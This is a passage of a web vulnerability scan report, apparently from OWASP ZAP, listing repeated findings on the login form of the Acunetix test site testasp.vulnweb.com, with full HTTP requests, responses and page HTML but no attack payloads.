href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
